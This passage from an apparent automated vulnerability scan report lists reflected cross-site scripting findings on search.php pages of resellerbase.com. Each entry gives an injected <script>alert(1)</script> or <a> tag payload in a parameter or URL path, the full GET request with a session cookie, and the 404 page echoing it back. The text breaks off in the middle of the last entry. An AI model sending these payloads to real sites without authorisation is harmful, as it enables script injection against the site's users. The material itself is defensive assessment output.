<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchd75cc<a>13fb2ce8384&opt=2 was not found on this server.</p>
...[SNIP]...

2.5207. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 169cd<a>2092df8ad08 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...169cd<a>2092df8ad08&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php?keyword=search...169cd<a>2092df8ad08&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5208. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38c28<script>alert(1)</script>2d9d2b4375c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&38c28<script>alert(1)</script>2d9d2b4375c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&38c28<script>alert(1)</script>2d9d2b4375c=1 was not found on this server.</p>
...[SNIP]...

2.5209. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 63e47<a>63f126c02a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=263e47<a>63f126c02a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=263e47<a>63f126c02a was not found on this server.</p>
...[SNIP]...

2.5210. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 735f8<script>alert(1)</script>df6499174d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service735f8<script>alert(1)</script>df6499174d9/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service735f8<script>alert(1)</script>df6499174d9/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5211. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9dfac<script>alert(1)</script>4ffe19148c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other9dfac<script>alert(1)</script>4ffe19148c8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other9dfac<script>alert(1)</script>4ffe19148c8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5212. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b27e<script>alert(1)</script>5caa97459b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes7b27e<script>alert(1)</script>5caa97459b1/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes7b27e<script>alert(1)</script>5caa97459b1/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5213. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92728<script>alert(1)</script>2a58388c1a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos92728<script>alert(1)</script>2a58388c1a2/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos92728<script>alert(1)</script>2a58388c1a2/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5214. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aeec2<script>alert(1)</script>0bfc4e2e1e1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/imagesaeec2<script>alert(1)</script>0bfc4e2e1e1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/imagesaeec2<script>alert(1)</script>0bfc4e2e1e1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5215. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5585f<script>alert(1)</script>6115082eca was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/search.php5585f<script>alert(1)</script>6115082eca?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php5585f<script>alert(1)</script>6115082eca?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5216. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b776c<a>5c96bda32fb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchb776c<a>5c96bda32fb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchb776c<a>5c96bda32fb&opt=2 was not found on this server.</p>
...[SNIP]...

2.5217. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e005c<a>9f9a3e5cd4a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...e005c<a>9f9a3e5cd4a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php?keyword=search...e005c<a>9f9a3e5cd4a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5218. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9573c<script>alert(1)</script>c884bcfe77c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9573c<script>alert(1)</script>c884bcfe77c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9573c<script>alert(1)</script>c884bcfe77c=1 was not found on this server.</p>
...[SNIP]...

2.5219. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload aba8e<a>a55a0f8e241 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2aba8e<a>a55a0f8e241 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2aba8e<a>a55a0f8e241 was not found on this server.</p>
...[SNIP]...

2.5220. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f26f2<script>alert(1)</script>34ad69fb6b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicef26f2<script>alert(1)</script>34ad69fb6b4/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicef26f2<script>alert(1)</script>34ad69fb6b4/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5221. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6e161<script>alert(1)</script>477de1d3b84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other6e161<script>alert(1)</script>477de1d3b84/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other6e161<script>alert(1)</script>477de1d3b84/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5222. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d5648<script>alert(1)</script>1aa91973b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesd5648<script>alert(1)</script>1aa91973b30/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesd5648<script>alert(1)</script>1aa91973b30/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5223. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2fc85<script>alert(1)</script>cdb365bab13 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos2fc85<script>alert(1)</script>cdb365bab13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos2fc85<script>alert(1)</script>cdb365bab13/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5224. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6eccc<script>alert(1)</script>2281b465b4a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/search.php6eccc<script>alert(1)</script>2281b465b4a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
